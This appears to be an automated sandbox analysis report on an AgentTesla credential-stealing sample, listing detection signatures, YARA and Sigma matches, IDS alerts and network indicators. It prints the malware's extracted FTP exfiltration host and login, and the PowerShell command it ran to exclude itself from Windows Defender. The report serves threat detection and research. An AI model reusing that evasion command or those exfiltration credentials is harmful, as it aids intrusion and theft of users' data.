Edit tour

Windows Analysis Report
wKmhzHd4MC.exe

Overview

General Information

Sample name:	wKmhzHd4MC.exe renamed because original name is a hash value
Original sample name:	f19d3e7a7e04ba607a9133d1e8aed617bc6d73ca314407b03c9ddfcce51ec3a4.exe
Analysis ID:	1529975
MD5:	38c9e1cf0e8f09bb1db22c49a68fc9b1
SHA1:	3477f20664e2fadde22a6f5d4d96ddbf0a1a6acd
SHA256:	f19d3e7a7e04ba607a9133d1e8aed617bc6d73ca314407b03c9ddfcce51ec3a4
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wKmhzHd4MC.exe (PID: 2084 cmdline: "C:\Users\user\Desktop\wKmhzHd4MC.exe" MD5: 38C9E1CF0E8F09BB1DB22C49A68FC9B1)

powershell.exe (PID: 6724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

wKmhzHd4MC.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\wKmhzHd4MC.exe" MD5: 38C9E1CF0E8F09BB1DB22C49A68FC9B1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2968931469.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wKmhzHd4MC.exe PID: 2084	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wKmhzHd4MC.exe PID: 2084	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: wKmhzHd4MC.exe PID: 2084	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wKmhzHd4MC.exe PID: 5628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wKmhzHd4MC.exe PID: 5628	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.wKmhzHd4MC.exe.3e8e830.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wKmhzHd4MC.exe.3e8e830.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wKmhzHd4MC.exe.3e8e830.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.wKmhzHd4MC.exe.3e8e830.4.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2e6da:$s2: GetPrivateProfileString 0x2ddd1:$s3: get_OSFullName 0x2f384:$s5: remove_Key 0x2f511:$s5: remove_Key 0x30452:$s6: FtpWebRequest 0x311fb:$s7: logins 0x3176d:$s7: logins 0x34450:$s7: logins 0x34530:$s7: logins 0x35e2e:$s7: logins 0x350ca:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31219:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3128b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31315:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x313a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31411:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31483:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31519:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x315a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2e6da:$s2: GetPrivateProfileString 0x2ddd1:$s3: get_OSFullName 0x2f384:$s5: remove_Key 0x2f511:$s5: remove_Key 0x30452:$s6: FtpWebRequest 0x311fb:$s7: logins 0x3176d:$s7: logins 0x34450:$s7: logins 0x34530:$s7: logins 0x35e2e:$s7: logins 0x350ca:$s9: 1.85 (Hash, version 2, native byte-order)
4.2.wKmhzHd4MC.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.wKmhzHd4MC.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.wKmhzHd4MC.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33019:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3308b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33115:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33211:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33283:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33319:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.wKmhzHd4MC.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x304da:$s2: GetPrivateProfileString 0x2fbd1:$s3: get_OSFullName 0x31184:$s5: remove_Key 0x31311:$s5: remove_Key 0x32252:$s6: FtpWebRequest 0x32ffb:$s7: logins 0x3356d:$s7: logins 0x36250:$s7: logins 0x36330:$s7: logins 0x37c2e:$s7: logins 0x36eca:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33019:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3308b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33115:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33211:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33283:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33319:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x304da:$s2: GetPrivateProfileString 0x2fbd1:$s3: get_OSFullName 0x31184:$s5: remove_Key 0x31311:$s5: remove_Key 0x32252:$s6: FtpWebRequest 0x32ffb:$s7: logins 0x3356d:$s7: logins 0x36250:$s7: logins 0x36330:$s7: logins 0x37c2e:$s7: logins 0x36eca:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33019:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6d439:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3308b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6d4ab:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33115:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6d535:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331a7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6d5c7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33211:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6d631:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33283:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6d6a3:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33319:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6d739:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333a9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6d7c9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x304da:$s2: GetPrivateProfileString 0x6a8fa:$s2: GetPrivateProfileString 0x2fbd1:$s3: get_OSFullName 0x69ff1:$s3: get_OSFullName 0x31184:$s5: remove_Key 0x31311:$s5: remove_Key 0x6b5a4:$s5: remove_Key 0x6b731:$s5: remove_Key 0x32252:$s6: FtpWebRequest 0x6c672:$s6: FtpWebRequest 0x32ffb:$s7: logins 0x3356d:$s7: logins 0x36250:$s7: logins 0x36330:$s7: logins 0x37c2e:$s7: logins 0x6d41b:$s7: logins 0x6d98d:$s7: logins 0x70670:$s7: logins 0x70750:$s7: logins 0x7204e:$s7: logins 0x36eca:$s9: 1.85 (Hash, version 2, native byte-order)
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\wKmhzHd4MC.exe", ParentImage: C:\Users\user\Desktop\wKmhzHd4MC.exe, ParentProcessId: 2084, ParentProcessName: wKmhzHd4MC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe", ProcessId: 6724, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\wKmhzHd4MC.exe", ParentImage: C:\Users\user\Desktop\wKmhzHd4MC.exe, ParentProcessId: 2084, ParentProcessName: wKmhzHd4MC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe", ProcessId: 6724, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T15:51:44.858745+0200	2029927	1	A Network Trojan was detected	192.168.2.4	49733	104.247.165.99	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T15:51:45.488591+0200	2855542	1	A Network Trojan was detected	192.168.2.4	49736	104.247.165.99	55462	TCP
2024-10-09T15:51:45.494271+0200	2855542	1	A Network Trojan was detected	192.168.2.4	49736	104.247.165.99	55462	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wKmhzHd4MC.exe

Avira: detected

Found malware configuration

Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}

Multi AV Scanner detection for submitted file

Source: wKmhzHd4MC.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: wKmhzHd4MC.exe

Joe Sandbox ML: detected

Source: wKmhzHd4MC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: wKmhzHd4MC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49736 -> 104.247.165.99:55462
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49733 -> 104.247.165.99:21

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 104.247.165.99 ports 63516,53292,1,2,55462,21

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 104.247.165.99:55462

Source: Joe Sandbox View

IP Address: 104.247.165.99 104.247.165.99

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: unknown

FTP traffic detected: 104.247.165.99:21 -> 192.168.2.4:49733 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 16:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ftp.normagroup.com.tr

Source: wKmhzHd4MC.exe, 00000004.00000002.2968931469.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.normagroup.com.tr
Source: wKmhzHd4MC.exe, 00000000.00000002.1757453592.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000000.00000002.1763856773.0000000005634000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wKmhzHd4MC.exe, 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, SKTzxzsJw.cs	.Net Code: TFawXa
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, SKTzxzsJw.cs	.Net Code: TFawXa

Installs a global keyboard hook

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\wKmhzHd4MC.exe

Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 0_2_011AD5DC	0_2_011AD5DC
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_01089760	4_2_01089760
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_01089BB0	4_2_01089BB0
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_01084A60	4_2_01084A60
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_0108CF20	4_2_0108CF20
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_01083E48	4_2_01083E48
